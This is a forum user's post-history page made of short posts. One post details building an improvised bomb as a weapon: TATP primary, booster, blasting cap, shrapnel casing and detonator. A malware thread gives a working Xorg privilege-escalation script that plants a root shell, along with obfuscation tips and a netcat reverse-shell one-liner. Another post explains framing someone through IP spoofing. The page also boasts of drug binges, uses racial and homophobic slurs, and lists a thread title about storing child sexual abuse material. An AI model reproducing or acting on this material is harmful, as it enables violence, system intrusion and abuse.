User Controls
Posts by Sophie
-
2021-07-25 at 10:27 PM UTC in I'm building an IED, but...
-
2021-07-25 at 10:25 PM UTC in The only shitty thing about coke straight from the brick.
-
2021-07-25 at 10:21 PM UTC in Sheesh, coke binges...
-
2021-07-25 at 10:18 PM UTC in The only shitty thing about coke straight from the brick.
Originally posted by AngryOnion Oh boy I know how this ends up.
You are going to need some time off.
Fortunately i am my own boss these days.
Originally posted by the man who put it in my hood are you sure its from the brick or did they dissolve the bricks in a drum of solvent to get it across
It's oily it's from the brick. Besides, when i got to my guys' house he was cutting baby bricks from a daddy brick and that's how cocaine is made buys and girls. -
2021-07-25 at 10:12 PM UTC in I'm building an IED, but...My container is gay, i got my chemicals chilling in the fridge, cuz i'm synthing TATP as primary, AP Putty as booster, i find it detonates much more readily than just TATP, as the latter can sometimes deflagrate. The blasting cap consists of a straw like tube(but thicker) inserted into a paraffin coated copper tube(so the TATP in the AP Putty doesn't play hokey with the copper) sealed on both ends with the tiniest of openings for the wiring. I'm using an old gas canister as container. But i have been bamboozled the container consists of two parts a thinner inner layer and a thick stainless steel outer layer. Shrapnel doesn't matter this is a weapon, however the steel isn't very thick at the bottom, in fact i'd call it sheet metal.
This will undoubtedly effect the nature of the explosion. I guess i could take a handful of big ball bearings touch weld them to the bottom which happens to be concave and use it as grape shot. But i'm afraid it's going to go right through my target all the way to a residential place and spray hot steel balls of death going at 8km/s on the people there.
I guess i could use a sort of metal cap filled with water, and attach it to the weaker part. I forget the technical term for a water buffer like that. Generally you use it in home made breaching charges too. but the idea here would be to have the water part face the ground so the explosive force will be directed to the sides of the canister. But there's a good chance the cannister is just gonna go KABOOM, break all the windows and go flying off into space.
I am not looking to build a rocket i want to build a bomb, i got a bigger canister that's perfect for the job but if i use the same techniques it's going to be way too fucking powerful. And i'd like to minimize collatoral damage. So, wut do?
If you're interested, haven't quite decided on a secondary yet, picric acid is dope but a fuck to make, so maybe Ammonal, maybe AMNM, maybe fucking RDX if i am really feeling it, but then again i don't want to have to synth RDX and picric acid, because imma need a higher VoD to get RDX to go boom. Plus i currently only have the means to plastify if that's a word, TATP. So meh...
Also interesting detail, i'm using a gravity switch as detonator. What is a gravity switch? Ask me all about it below. -
2021-07-25 at 9:37 PM UTC in Sheesh, coke binges...
Originally posted by WellHung Any poser can do blow for 6-8 hours on a Friday night. REAL men do meth.
White trash do meth. I've spent more money on coke in the last 9 days than you make in a month. And i make more in a month than you do in a year. Don't even think i handle drug matters in a similar manner you do. -
2021-07-25 at 9:29 PM UTC in The only shitty thing about coke straight from the brick.Are the slight remains of the petrochemical mixture used to press them. Makes it a little oily and is not conducive to laying fine powder lines.
Yes the coke binge continues, fuck the police. -
2021-07-25 at 7:41 AM UTC in Sh/Bash based malware for *Nix.
-
2021-07-24 at 10:11 AM UTC in Sheesh, coke binges...
-
2021-07-24 at 7:51 AM UTC in Sheesh, coke binges...
Originally posted by WellHung how shitty and stepped on is the coca?
It's pathetic when you front like this faggot if you've ever done more than a gram or two in a single sitting you'd know this is just what happens if you over indulge, even if you got flake, nigger.
Besides i know for a fact you're double fronting. You live in a fucking motel dude, no way you can afford coke, lmao. -
2021-07-24 at 7:24 AM UTC in Sh/Bash based malware for *Nix.Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.
So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.
What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.
Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.
Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.
Here's an example.
#!/bin/bash
# There are a bunch of vulns in the Xorg server and related utils like
#
# X.Org xorg-x11-xfs - Local Race Condition
# xorg-x11-server - 'inittab Local Privilege Escalation
#
# And much more, we're gonna do the second one as an example
#
# When ##!!## occurs in the script i got some annotations below
#
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/x_orgasm
# prepare your anus
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg ##!!##_4
sleep 120
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
# Start elevated Sh
/usr/local/bin/pwned
##!!##_1
Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.
Alternatively we could ship a shell in Asm with the payload up top.
##!!##_2
/tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.
/usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x
##!!##_3
The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.
Obfuscation
There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.
String/Hex Hash, 1 Iteration
Token/ForCode, 1 Iteration
Find the result here
Or if you prefer a picture check the spoiler out below.
Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.
I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:
#!/usr/bin/env -S sh\_"umask\_700"\_-f
# BTW This is legal right ^
#
# I'm U_masking because i am writing stuff out
# Under a specific user account
buff_ops()
{ # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
cmd=$0
arg=$1
mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops CMD ARG # <- is what i want
I figured it should be good since stuff like this works also:
rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x
Thicc threads niggas. One on low level security and dev incoming soon as well. -
2021-07-23 at 3:19 AM UTC in Sheesh, coke binges...
-
2021-07-23 at 2:48 AM UTC in Sheesh, coke binges...Earned a lot of money last week, been binging for 6 days. Maybe i should lay off after i finish my latest 8 ball, i got a waterfall of blood coming out of my nose atm.
Been taking some k-pins and oxy too with it i'm so high i was like heh blood whatever and railed another line lol.
Shit niggas, what do you suppose is worse for your nose, railing tek or railing coke? -
2021-07-21 at 11:14 AM UTC in ATTN: PeePeePooPooI knew it was a fork but i thought it was from the same devs. In any case, combined with the Rizin GUI called Cutter. It is in my opinion the superior implementation by a large margin. And for sure fam, working on them skills is something every h4xx0r should set some time aside for. Even if it's just a few hours a week. It definitely makes a difference.
-
2021-07-21 at 10:16 AM UTC in ATTN: PeePeePooPooYour recommendation on getting Radare2 has turned out to be great. After The new Rizin Framework was released by the same devs, and the GUI Cutter came out, i was completely sold. I fucking love using Cutter. I might go as far as to say it's imho the best debugger i have ever had the pleasure of working with. the cross platform capabilities and emulation are top notch, and i am a happy h4xx0r because of it.
So thanks fam. If i have the time, i am planning on writing a low level dev/security thread today where the framework will feature prominently. When i do so i do hope you read it and provide some feedback and possibly insight. -
2021-07-21 at 10:10 AM UTC in Windows 11
-
2021-07-21 at 10:09 AM UTC in How to safely store 1TB of child porn
-
2021-07-21 at 9:57 AM UTC in Good Morning, I am Prarie Dog.How the hell did you end up here of all places?
-
2021-07-20 at 8:40 AM UTC in Wario Deserves a Title
Originally posted by Lanny Legit kinda mad about imgur blacklisting us. Fuck you wariat. I hope one of those ugly ass crones you’re always chasing takes you home and goes all hostel on your ass. She’d be unknowingly making the world a safer place for children.
If you give me his IP, i'll blacklist his from all of the internet. It's easy as a matter of fact you can do it to, just run a scan of the entire internet with a multithreaded mass scanner, while you spoof his IP as the source address, UDP scan works best. -
2021-07-20 at 8:25 AM UTC in There's no such thing as a coincidence.The Devil conducts the orchestra, and everyone dances to his tune.